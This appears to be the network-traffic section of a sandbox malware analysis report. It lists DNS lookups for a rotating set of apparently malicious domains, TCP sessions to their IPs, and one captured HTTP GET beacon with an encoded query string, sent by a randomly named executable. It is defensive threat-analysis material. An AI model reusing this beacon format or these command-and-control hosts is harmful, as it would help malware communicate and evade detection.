May 23, 2024 15:21:58.467799902 CEST | 49755 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:21:58.470715046 CEST | 49755 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:21:58.521138906 CEST | 80 | 49755 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:21:59.138900042 CEST | 80 | 49755 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:21:59.143527985 CEST | 80 | 49755 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:21:59.143745899 CEST | 49755 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:21:59.983840942 CEST | 49755 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:01.000965118 CEST | 49756 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:01.006561995 CEST | 80 | 49756 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:01.006643057 CEST | 49756 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:01.008996964 CEST | 49756 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:01.061216116 CEST | 80 | 49756 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:01.681588888 CEST | 80 | 49756 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:01.686403036 CEST | 80 | 49756 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:01.686460972 CEST | 49756 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:02.515701056 CEST | 49756 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:03.533046961 CEST | 49757 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:03.538033009 CEST | 80 | 49757 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:03.538095951 CEST | 49757 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:03.539709091 CEST | 49757 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:03.544627905 CEST | 80 | 49757 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:03.597951889 CEST | 80 | 49757 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:04.313246965 CEST | 80 | 49757 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:04.317903996 CEST | 80 | 49757 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:04.319752932 CEST | 49757 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:05.045030117 CEST | 49757 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:06.063711882 CEST | 49758 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:06.069087982 CEST | 80 | 49758 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:06.069178104 CEST | 49758 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:06.071713924 CEST | 49758 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:06.121407986 CEST | 80 | 49758 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:06.743333101 CEST | 80 | 49758 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:06.749661922 CEST | 80 | 49758 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:06.749742985 CEST | 49758 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:06.750730038 CEST | 49758 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:22:06.801163912 CEST | 80 | 49758 | 92.118.24.161 | 192.168.2.6
May 23, 2024 15:22:11.822333097 CEST | 49759 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:11.827538967 CEST | 80 | 49759 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:11.829437971 CEST | 49759 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:11.829591036 CEST | 49759 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:11.881078959 CEST | 80 | 49759 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:12.477113962 CEST | 80 | 49759 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:12.481829882 CEST | 80 | 49759 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:12.483724117 CEST | 49759 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:13.341978073 CEST | 49759 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:14.361088037 CEST | 49760 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:14.366133928 CEST | 80 | 49760 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:14.367846966 CEST | 49760 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:14.369345903 CEST | 49760 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:14.422383070 CEST | 80 | 49760 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:15.010584116 CEST | 80 | 49760 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:15.015347004 CEST | 80 | 49760 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:15.015403986 CEST | 49760 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:15.873735905 CEST | 49760 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:16.892323971 CEST | 49761 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:16.898130894 CEST | 80 | 49761 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:16.898212910 CEST | 49761 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:16.900433064 CEST | 49761 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:16.905548096 CEST | 80 | 49761 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:16.956243992 CEST | 80 | 49761 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:17.539033890 CEST | 80 | 49761 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:17.543870926 CEST | 80 | 49761 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:17.543951035 CEST | 49761 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:19.368113995 CEST | 49761 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:20.375583887 CEST | 49762 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:20.380669117 CEST | 80 | 49762 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:20.380736113 CEST | 49762 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:20.382287025 CEST | 49762 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:20.434606075 CEST | 80 | 49762 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:21.060877085 CEST | 80 | 49762 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:21.065676928 CEST | 80 | 49762 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:21.065947056 CEST | 49762 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:21.066605091 CEST | 49762 | 80 | 192.168.2.6 | 212.227.172.253
May 23, 2024 15:22:21.117137909 CEST | 80 | 49762 | 212.227.172.253 | 192.168.2.6
May 23, 2024 15:22:26.101608992 CEST | 49763 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:26.116686106 CEST | 80 | 49763 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:26.116871119 CEST | 49763 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:26.119154930 CEST | 49763 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:26.187675953 CEST | 80 | 49763 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:26.582159996 CEST | 80 | 49763 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:26.582367897 CEST | 49763 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:28.701569080 CEST | 49763 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:28.706702948 CEST | 80 | 49763 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:29.719037056 CEST | 49764 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:29.724267006 CEST | 80 | 49764 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:29.724354982 CEST | 49764 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:29.725642920 CEST | 49764 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:29.781203032 CEST | 80 | 49764 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:30.197575092 CEST | 80 | 49764 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:30.197714090 CEST | 49764 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:31.232693911 CEST | 49764 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:31.237871885 CEST | 80 | 49764 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:32.251780033 CEST | 49765 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:32.257201910 CEST | 80 | 49765 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:32.258635044 CEST | 49765 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:32.260241985 CEST | 49765 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:32.265650034 CEST | 80 | 49765 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:32.315459967 CEST | 80 | 49765 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:32.727677107 CEST | 80 | 49765 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:32.731897116 CEST | 49765 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:33.763952971 CEST | 49765 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:33.772507906 CEST | 80 | 49765 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:34.782387972 CEST | 49766 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:22:34.787571907 CEST | 80 | 49766 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:22:34.787683010 CEST | 49766 | 80 | 192.168.2.6 | 3.33.130.190
                                  May 23, 2024 15:22:34.789547920 CEST4976680192.168.2.63.33.130.190
                                  May 23, 2024 15:22:34.841414928 CEST80497663.33.130.190192.168.2.6
                                  May 23, 2024 15:22:35.285506964 CEST80497663.33.130.190192.168.2.6
                                  May 23, 2024 15:22:35.290215015 CEST80497663.33.130.190192.168.2.6
                                  May 23, 2024 15:22:35.290378094 CEST4976680192.168.2.63.33.130.190
                                  May 23, 2024 15:22:35.291126013 CEST4976680192.168.2.63.33.130.190
                                  May 23, 2024 15:22:35.349839926 CEST80497663.33.130.190192.168.2.6
                                  May 23, 2024 15:22:43.345951080 CEST4976780192.168.2.669.57.162.24
                                  May 23, 2024 15:22:43.351113081 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:43.351246119 CEST4976780192.168.2.669.57.162.24
                                  May 23, 2024 15:22:43.353050947 CEST4976780192.168.2.669.57.162.24
                                  May 23, 2024 15:22:43.401112080 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:43.935703039 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:43.940427065 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:43.940444946 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:43.940608978 CEST4976780192.168.2.669.57.162.24
                                  May 23, 2024 15:22:43.945804119 CEST4976780192.168.2.669.57.162.24
                                  May 23, 2024 15:22:43.993128061 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:48.955769062 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:48.961035967 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:48.961148977 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:48.963737965 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:49.013346910 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.568794012 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.570089102 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.570168972 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:49.573481083 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.573517084 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.573549032 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.573573112 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:49.573611975 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:49.619541883 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.619648933 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:50.467087984 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:51.485528946 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:51.491693020 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:51.491780043 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:51.493680954 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:51.549731016 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.053009033 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.054665089 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.054717064 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:52.058073997 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.058090925 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.058105946 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.058146954 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:52.058199883 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:52.103465080 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.103533030 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:52.998280048 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:54.017860889 CEST4977080192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:54.023099899 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.023611069 CEST4977080192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:54.025618076 CEST4977080192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:54.038835049 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.087321997 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.593547106 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.594374895 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.594573021 CEST4977080192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:54.598418951 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.598424911 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.598436117 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.598504066 CEST4977080192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:55.529577017 CEST4977080192.168.2.6162.240.81.18
                                  TimestampSource PortDest PortSource IPDest IP
                                  May 23, 2024 15:18:49.648089886 CEST5334853192.168.2.61.1.1.1
                                  May 23, 2024 15:18:49.668534040 CEST53533481.1.1.1192.168.2.6
                                  May 23, 2024 15:19:05.345263958 CEST5917653192.168.2.61.1.1.1
                                  May 23, 2024 15:19:05.824011087 CEST53591761.1.1.1192.168.2.6
                                  May 23, 2024 15:19:19.329221964 CEST5227853192.168.2.61.1.1.1
                                  May 23, 2024 15:19:19.616153002 CEST53522781.1.1.1192.168.2.6
                                  May 23, 2024 15:19:32.751833916 CEST6298453192.168.2.61.1.1.1
                                  May 23, 2024 15:19:32.763287067 CEST53629841.1.1.1192.168.2.6
                                  May 23, 2024 15:19:46.276344061 CEST5166353192.168.2.61.1.1.1
                                  May 23, 2024 15:19:46.303020954 CEST53516631.1.1.1192.168.2.6
                                  May 23, 2024 15:19:59.658524990 CEST5516853192.168.2.61.1.1.1
                                  May 23, 2024 15:19:59.936491013 CEST53551681.1.1.1192.168.2.6
                                  May 23, 2024 15:20:14.599570036 CEST6306053192.168.2.61.1.1.1
                                  May 23, 2024 15:20:14.631174088 CEST53630601.1.1.1192.168.2.6
                                  May 23, 2024 15:20:29.361541033 CEST5363553192.168.2.61.1.1.1
                                  May 23, 2024 15:20:29.386336088 CEST53536351.1.1.1192.168.2.6
                                  May 23, 2024 15:20:42.785188913 CEST6527853192.168.2.61.1.1.1
                                  May 23, 2024 15:20:42.859942913 CEST53652781.1.1.1192.168.2.6
                                  May 23, 2024 15:21:01.188491106 CEST4961153192.168.2.61.1.1.1
                                  May 23, 2024 15:21:01.483669996 CEST53496111.1.1.1192.168.2.6
                                  May 23, 2024 15:21:15.690161943 CEST5053253192.168.2.61.1.1.1
                                  May 23, 2024 15:21:15.735146046 CEST53505321.1.1.1192.168.2.6
                                  May 23, 2024 15:21:30.032669067 CEST5713253192.168.2.61.1.1.1
                                  May 23, 2024 15:21:30.217411041 CEST53571321.1.1.1192.168.2.6
                                  May 23, 2024 15:21:43.735953093 CEST6187553192.168.2.61.1.1.1
                                  May 23, 2024 15:21:43.943917036 CEST53618751.1.1.1192.168.2.6
                                  May 23, 2024 15:21:58.329289913 CEST5830653192.168.2.61.1.1.1
                                  May 23, 2024 15:21:58.456868887 CEST53583061.1.1.1192.168.2.6
                                  May 23, 2024 15:22:11.766572952 CEST6286053192.168.2.61.1.1.1
                                  May 23, 2024 15:22:11.816402912 CEST53628601.1.1.1192.168.2.6
                                  May 23, 2024 15:22:26.079948902 CEST6070353192.168.2.61.1.1.1
                                  May 23, 2024 15:22:26.099338055 CEST53607031.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 15:18:49.648089886 CEST | 192.168.2.6 | 1.1.1.1 | 0x28a5 | Standard query (0) | www.emgeecontracting.shop | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:05.345263958 CEST | 192.168.2.6 | 1.1.1.1 | 0xfa70 | Standard query (0) | www.upshercode.store | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:19.329221964 CEST | 192.168.2.6 | 1.1.1.1 | 0x95a8 | Standard query (0) | www.botcsllc.com | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:32.751833916 CEST | 192.168.2.6 | 1.1.1.1 | 0x349f | Standard query (0) | www.darkerberrycoffee.com | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:46.276344061 CEST | 192.168.2.6 | 1.1.1.1 | 0xc559 | Standard query (0) | www.featurasandals.com | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:59.658524990 CEST | 192.168.2.6 | 1.1.1.1 | 0xb1ab | Standard query (0) | www.anoldshow.top | A (IP address) | IN (0x0001) | false
May 23, 2024 15:20:14.599570036 CEST | 192.168.2.6 | 1.1.1.1 | 0xed7e | Standard query (0) | www.badcopsinyourtown.info | A (IP address) | IN (0x0001) | false
May 23, 2024 15:20:29.361541033 CEST | 192.168.2.6 | 1.1.1.1 | 0xf765 | Standard query (0) | www.autonomyai.xyz | A (IP address) | IN (0x0001) | false
May 23, 2024 15:20:42.785188913 CEST | 192.168.2.6 | 1.1.1.1 | 0x34f9 | Standard query (0) | www.brzuszkiewicz.pl | A (IP address) | IN (0x0001) | false
May 23, 2024 15:21:01.188491106 CEST | 192.168.2.6 | 1.1.1.1 | 0x91ad | Standard query (0) | www.novosti-dubai.ru | A (IP address) | IN (0x0001) | false
May 23, 2024 15:21:15.690161943 CEST | 192.168.2.6 | 1.1.1.1 | 0x44bc | Standard query (0) | www.ilodezu.com | A (IP address) | IN (0x0001) | false
May 23, 2024 15:21:30.032669067 CEST | 192.168.2.6 | 1.1.1.1 | 0xe732 | Standard query (0) | www.kubanci.ru | A (IP address) | IN (0x0001) | false
May 23, 2024 15:21:43.735953093 CEST | 192.168.2.6 | 1.1.1.1 | 0x754e | Standard query (0) | www.dvizhenie-pallet.ru | A (IP address) | IN (0x0001) | false
May 23, 2024 15:21:58.329289913 CEST | 192.168.2.6 | 1.1.1.1 | 0xee3a | Standard query (0) | www.szandraromanovics.hu | A (IP address) | IN (0x0001) | false
May 23, 2024 15:22:11.766572952 CEST | 192.168.2.6 | 1.1.1.1 | 0xd799 | Standard query (0) | www.fruitique.co.uk | A (IP address) | IN (0x0001) | false
May 23, 2024 15:22:26.079948902 CEST | 192.168.2.6 | 1.1.1.1 | 0x5469 | Standard query (0) | www.isrninjas.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 15:18:49.668534040 CEST | 1.1.1.1 | 192.168.2.6 | 0x28a5 | No error (0) | www.emgeecontracting.shop | emgeecontracting.shop | - | CNAME (Canonical name) | IN (0x0001) | false
May 23, 2024 15:18:49.668534040 CEST | 1.1.1.1 | 192.168.2.6 | 0x28a5 | No error (0) | emgeecontracting.shop | - | 69.57.162.24 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:05.824011087 CEST | 1.1.1.1 | 192.168.2.6 | 0xfa70 | No error (0) | www.upshercode.store | upshercode.store | - | CNAME (Canonical name) | IN (0x0001) | false
May 23, 2024 15:19:05.824011087 CEST | 1.1.1.1 | 192.168.2.6 | 0xfa70 | No error (0) | upshercode.store | - | 162.240.81.18 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:19.616153002 CEST | 1.1.1.1 | 192.168.2.6 | 0x95a8 | No error (0) | www.botcsllc.com | - | 216.40.34.41 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:32.763287067 CEST | 1.1.1.1 | 192.168.2.6 | 0x349f | No error (0) | www.darkerberrycoffee.com | darkerberrycoffee.com | - | CNAME (Canonical name) | IN (0x0001) | false
May 23, 2024 15:19:32.763287067 CEST | 1.1.1.1 | 192.168.2.6 | 0x349f | No error (0) | darkerberrycoffee.com | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:32.763287067 CEST | 1.1.1.1 | 192.168.2.6 | 0x349f | No error (0) | darkerberrycoffee.com | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:46.303020954 CEST | 1.1.1.1 | 192.168.2.6 | 0xc559 | No error (0) | www.featurasandals.com | - | 104.21.28.203 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:46.303020954 CEST | 1.1.1.1 | 192.168.2.6 | 0xc559 | No error (0) | www.featurasandals.com | - | 172.67.147.144 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:19:59.936491013 CEST | 1.1.1.1 | 192.168.2.6 | 0xb1ab | No error (0) | www.anoldshow.top | - | 203.161.43.228 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:20:14.631174088 CEST | 1.1.1.1 | 192.168.2.6 | 0xed7e | No error (0) | www.badcopsinyourtown.info | badcopsinyourtown.info | - | CNAME (Canonical name) | IN (0x0001) | false
May 23, 2024 15:20:14.631174088 CEST | 1.1.1.1 | 192.168.2.6 | 0xed7e | No error (0) | badcopsinyourtown.info | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:20:14.631174088 CEST | 1.1.1.1 | 192.168.2.6 | 0xed7e | No error (0) | badcopsinyourtown.info | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:20:29.386336088 CEST | 1.1.1.1 | 192.168.2.6 | 0xf765 | No error (0) | www.autonomyai.xyz | autonomyai.xyz | - | CNAME (Canonical name) | IN (0x0001) | false
May 23, 2024 15:20:29.386336088 CEST | 1.1.1.1 | 192.168.2.6 | 0xf765 | No error (0) | autonomyai.xyz | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:20:29.386336088 CEST | 1.1.1.1 | 192.168.2.6 | 0xf765 | No error (0) | autonomyai.xyz | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:20:42.859942913 CEST | 1.1.1.1 | 192.168.2.6 | 0x34f9 | No error (0) | www.brzuszkiewicz.pl | - | 185.253.212.22 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:21:01.483669996 CEST | 1.1.1.1 | 192.168.2.6 | 0x91ad | No error (0) | www.novosti-dubai.ru | - | 87.236.16.214 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:21:15.735146046 CEST | 1.1.1.1 | 192.168.2.6 | 0x44bc | No error (0) | www.ilodezu.com | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:21:15.735146046 CEST | 1.1.1.1 | 192.168.2.6 | 0x44bc | No error (0) | www.ilodezu.com | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:21:30.217411041 CEST | 1.1.1.1 | 192.168.2.6 | 0xe732 | No error (0) | www.kubanci.ru | - | 194.58.112.174 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:21:43.943917036 CEST | 1.1.1.1 | 192.168.2.6 | 0x754e | No error (0) | www.dvizhenie-pallet.ru | - | 5.101.153.149 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:21:58.456868887 CEST | 1.1.1.1 | 192.168.2.6 | 0xee3a | No error (0) | www.szandraromanovics.hu | szandraromanovics.hu | - | CNAME (Canonical name) | IN (0x0001) | false
May 23, 2024 15:21:58.456868887 CEST | 1.1.1.1 | 192.168.2.6 | 0xee3a | No error (0) | szandraromanovics.hu | - | 92.118.24.161 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:22:11.816402912 CEST | 1.1.1.1 | 192.168.2.6 | 0xd799 | No error (0) | www.fruitique.co.uk | - | 212.227.172.253 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:22:26.099338055 CEST | 1.1.1.1 | 192.168.2.6 | 0x5469 | No error (0) | www.isrninjas.com | isrninjas.com | - | CNAME (Canonical name) | IN (0x0001) | false
May 23, 2024 15:22:26.099338055 CEST | 1.1.1.1 | 192.168.2.6 | 0x5469 | No error (0) | isrninjas.com | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
May 23, 2024 15:22:26.099338055 CEST | 1.1.1.1 | 192.168.2.6 | 0x5469 | No error (0) | isrninjas.com | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49705 | 69.57.162.24 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
Timestamp | Bytes transferred | Direction | Data
May 23, 2024 15:18:49.680830002 CEST | 500 | OUT | GET /88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
Host: www.emgeecontracting.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
May 23, 2024 15:18:50.298168898 CEST | 1236 | IN | HTTP/1.1 404 Not Found
keep-alive: timeout=5, max=100
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 23 May 2024 13:18:50 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
connection: close
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
May 23, 2024 15:18:50.303018093 CEST | 316 | IN |
Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
